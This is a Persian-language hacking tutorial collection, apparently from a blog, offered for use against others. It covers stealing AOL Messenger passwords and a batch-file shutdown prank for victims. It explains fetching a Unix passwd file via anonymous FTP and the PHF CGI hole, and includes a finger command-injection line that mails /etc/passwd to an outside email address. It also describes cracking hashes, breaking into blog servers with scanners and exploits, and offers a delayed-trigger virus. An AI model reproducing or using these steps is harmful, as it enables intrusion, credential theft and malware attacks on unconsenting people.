سلام این آموزش برای کسانی که با آ و ل مسنجر چت میکنن که میتونند به راحتی هر چه تمام ای دی افرادو هک کنند برای این کار همان طور که تو شکل زیر میبینیدشما فقط کافیه آی پی طرفو پیدا کنید که کاره سختی نیستش و میتونید در منوی tool در قسمت ip sniffer با کپی کردن لینک مربوطه و فرستادن در چت آی پی طرفو پیدا کنید بعد از پیدا کردن ای پی اونو تو قسمت ip address مینویسید و کانکتو میزنید بعد از کانکت شدن ای دی طرفو تو قسمت screenname to get بعد get password میزنیمو فایل پسوردو میذاره کف دستتون به همین راحتی اگه خاصی کفر طرفم در بیاری با زدن reboot سیستم طرفو ریست کن
در خط اول @echo off
Shutdown –s –t XX برای خاموش شدن سیستم پس از اتمام زمان تعیین شده
Shutdown –r –t XX برای ری- استارت شدن سیستم پس از اتمام زمان تعیین شده
Shutdown –l –t XX برای لوگ آف شدن سیستم پس از اتمام زمان تعیین شده
Shutdown –f –t XX برای لوگ آف شدن سیستم پس از اتمام زمان تعیین شده
نکته ! در دستور ها بجای XX باید یک زمان بر حسب ثانیه تعیین کرد
نکته ! توجه داشته باشید که هر یک فاصله را در دستورات درست بزنید
نکته ! ضمنا می تونید دستورات را از اینجا کپی کنید
نکته ! ضمنا برای پی از اجرای فایل درست شد چنان چه از کار خود پشیمان شدید می تواند در run این دستور را تایپ و اکی کرد ---< shutdown -a
خوب حالا باید برنامه notepad را با هر اسم دلخواهی ولی حتما با پسوند .bat ذخیره کرد
یکی از سرورهایی است که در جهان بسیار از آن استفاده می شود در ایران و دربیشتر شهر های بزرگ هم ISPهایی وجود دارند که سرور آن ها Unixباشند .بنابر این شما می توانید برای هک آن ها از این راه ها استفاده کنید شما در این راه احتمالا با مشکلات زیادی برخورد خواهید کرد .من راه کامل و بی عیبی را در اختیار شما نمی گذارم برای نفوذ گر شدن باید تلاش بسیاری کرد و این اشاره ای است که شما را به طرف راه درست هدایت می کند .برای هک یونیکس از این طریق عمل می کنند که با روش هایی که ذکر خواهد شد فایل حاوی Passwordها و IDها را که به نام Passwdمی باشد دریافت کنند .این فایل یک فایل متنی است که در آن اطلاعات بصورت رمز در آمده .وقتی شما یک فایل Passwdرا باز کنید چنین نوشته هایی را می بینید .که باید آن را از حالت رمز در آورد . root:2fkbNba29uWys:0:1:Operator:/:/bin/csh admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:3A62i9qr:1012:10:Mashhad در اینجا مثلا Tahaنام IDو 3a62...کلمه عبور اما به صورت رمز در آمده می باشد . شاید فایل به شکل زیر هم باشد .اما این فایل کار را غیرممکن می سازد.در صورتی که به شکل زیر باشد یعنی در آن علامت *به جای کلمه ی به رمز آمده به آن ها Shadowedگفته می شود . root:*:0:1:Operator:/:/bin/csh admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh Taha:*:1012:10:mashhad BFH:/home/user/Taha:/usr/local/bin/tcsh ما فعلا می خواهیم این فایل را دریافت کنیم .اولین قدم این است که آیدی در آن ISPبرای خود دست و پا کنیم .حالا این آیدی می تواند متعلق به دوستمان باشد و یا یک آشنای دور .پیدا کردن رمز دوست شما به سادگی میسر است که در حوصله این مقاله نمی گنجد .بعد از پیدا کردن رمز شما با آیدی دوستتان به شبکه Connectشوید .این اتصال می تواند یک اتصال به طریق Modem DialUp Connectionباشد .بعد از اتصال کامل وارد قسمت MS-DOS Promptشوید و فرمان زیر را وارد کنید FTP http://www.domain.com/ که Domainآدرس سرور ISPمی باشد سپس از شما خواسته می شود تا آیدی خود را وارد کنید کلمه ی Anonymousرا بزنید .سپس وقتی درخواست کلمه عبور شد کلید Enterرا بزنید .اگر وارد سیستم شدید موفق شده اید در غیر این صورت جمله ی login failedدریافت می شود .دوباره امتحان کنید و این بار در کادر Passwordآدرس Emailای را وارد کنید .اگر این بار هم جواب نداد به جای کلمه ی anonymousاز Userخود یعنی دوستتان استفاده کنید . احتمال دارد این بار هم موفق نشوید .این دفعه روش های فوق را برای دستور زیر امتحان کنید FTP ftp://ftp.domain.com/ اگر این بار هم جوابی نگرفتید با ISPتماس گرفته و سوال کنید که چگونه می توانم از سرور FTPخود شما استفاده کنم چون وارد سیتمتان نمی شود اگر پرسید برای چه می خواهید وارد شوید بگویید می خواهم از نرم افزار های آن استفاده کنم ولی مواظب باشید که نام خود را نگویید .خلاصه تمام تلاش خود را برای فهمیدن روش دستیابی به سیستم بکنید اگر توانستید وارد سیستم شوید به راحتی می توانید وارد شاخه ی مشخصی رفته و فایل Passwdها را بگیرید ولی احتمال دارد که آن شاخه برای شما قفل شده باشد .برای کار با FTPباید دستورات FTPرا یاد داشته باشید .برای لسیت دستورات می توانید ?را تایپ کنید .ابتدا به شاخه ی ETCبروید می توانید فایل passwdرا در آنجا پیدا کنید .این فایل را بگیرید .اگر در آنجا نبود شاخه های دیگر را امتحان کنید .ولی به احتمال زیاد همانجاست .حال اگر اصلا نتوانستید وارد FTPشوید می توانید این فایل را با استفاده از قایلبیت PHFبگیرید .به این صورت که در Internet Browserخود آدرس زیر را وارد کنید . http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd اگر به این صورت هم نتوانستید آن را بگیرید می توانید از طریق Fingerاین کار را انجام دهید .این روش به شرطی جواب می دهد که Serverمورد نظر قابلیت Fingerرا داشته باشد .به آدرس زیر مراجعه کنید . www.domain.com/cgi-bin/finger اگر این آدرس کار نکند دیگر هیچ امیدی نیست اما اگر کار کند کادری جلوی شما ظاهر می شود که می خواهد نام مورد نظر خود را بدهید .آدرس زیر را وارد کنید . ID@domain.com ; /bin/mail you@somewhere.com < etc/passwd که در این آدرس IDشناسه کاربری یک شخص است که مثلا می توانید از آیدی دوستتان استفاده کنید domain.comآدرس نام حوزه ی ISPاست و آدرس you@somewhere.comآدرس Emailشماست مثلا این یک نمونه است . bfh@internet.com ; /bin/mail amir6_6_6@yahoo.com < etc/passwd با وارد کردن این دستور فایل Passwdبرای من به آدرس 3dhack@yahoo.com پست می شود ! خوب حالا تا الان اگر توانسته اید فایل را گرفته باشید که بهتر در غیر اینصورت باید بی خیال این روش شوید . حالا اگر فایل shadowedگیر آوردید بقیه ی متن را نخوانید چون کمکی به شما نمی کند و باید از روش های دیگری استفاده کرد .اما اگر یک فایل مثل نمونه اولی که در بالا بود گیر آوردید می توانید کار خود را ادامه دهید حالا شما نیاز به یک برنامه ی Unix Password Crackerدارید معروف ترین این نوع برنامه ها John Ripperو Cracker Jackمی باشد .اما John Ripper سریعترین نوع این برنامه می باشد .این دو برنامه را می توانید از همان آدرس قبلی یعنی www.hackersclub.com/km/frontpageبه دست بیاورید اما نمونه ی دیگری از این نمونه برنامه ها به کتابخانه هک به نام jill_v20 ارسال شد .با استفاده از این برنامه ها می توانید به هدف خود برسید . به همین راحتی ..... و روش بعد : +در آینده ای نزدیک اگه پیشنهادها زیاد تر بشه و این بر و بچ پرشین بلاگ گیر ندن یه آموزش آماده کردم که با عکس توضیح دادم این روش 99 درصد عملی است و انجام می شه من که مشکلی نداشتم
هک کردن یک وبلاگ به صورت حرفه ای کار چندان ساده ای نیست و مستلزم این است که شما با مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer NMAP , Nessus بلد باشید و بتوانید با Exploit ها کار کنید البته من نمی خواهم شما را از این کار نا امید کنم ولی بهتر است این نرم افزارها و چیزهایی را که گفتم بلد باشید
خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:
http://www.victim.blogserver.com/
که victim آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم که من در زیر اسم چندتا برنامه ی معروف کرک پسورد یا Password Cracker را گذاشته ام:
John the ripper
L0pht crack
Palm crack
که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length)) آن شروع به شکست کد آن می نماید.یادتان باشد که L0pht crack بعد از حرف L صفر یعنی0 را دارد نه O
حالا ما چگونه به یک سرور وارد شویم؟
شما می توانید با پیدا کردن Vulnerability های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP و یا Nessus و امتحان Exploit های نوشته شده برای آن آسیب پذیری ها ((Vulnerability)) به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته این یادتان باشد که فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید و به قسمت های دیگر به هیچ عنوان نوذ نکنید در ضمن این کار با هک کردن سایت فرق می کند اما روش های نزدیک به همی برای انجام هر دوی آن ها استفاده می شود
البته بلاگفا تا چند روز پیش در رده ی دوم قرار داشت اما به دلیل اخذ تدابیر امنیتی خوب در رده ی پنجم جای گرفت.البته من این رده بندی را براساس تعداد وبلاگ های هک شده ی آن سرور،تدابیر امنیتی اتخاذ شده ی آن سرور،تعداد دفعاتی که خودم به آن سرور نفوذ کرده ام و سوال از حدود 16 هکر انجا داده ام.
البته اگر این را برای شما سخت است من در پست بعد روش دیگری را که کمی آسان تر است را به شما می گویم.
خوب این هم از آموزش هک کردن وبلاگ قسمت اول.
یکی از دوستان پرسیده بودند که برنامه ی THC-scan 2.0 را ار سایت اصلی اش دانلود کرده ام اما موقعی که روی برنامه کلیک می کنم صفحه ی سیاهی می یاد و بعدش می ره چه کار کنم؟
دوست عزیز من آسان ترین راه را به شما می گویم اول برنامه یعنی فایل .exe را به پوشه ی System 32 ویندوز خود ببرید و CMD را اجرا کرده و نام برنامه را که در زیر آیکون قرار دارد را در آن بنویسید و Enter کنید و پس از اجرا کار خود را انجام بدید
این ویروس خیلی ساده فقط کارش از کار انداختن یاهو مسنجر است .
یه ویروس خیلی عالی . این ویروس بعد از ورود و اجرا شدن در کامپیوتر قربانی ابتدا به صورت یک برنامه ی ساده اجرا میشود و بعد از ۱۰ بار خاموش و روشن شدن کامپیوتر شروع به فعالیت میکند . در این صورت قربانی پی نخواهد برد که توسط چه کسی مورد حمله قرار گرفته است .
فقط رو سیستم خودتون اجراش نکنید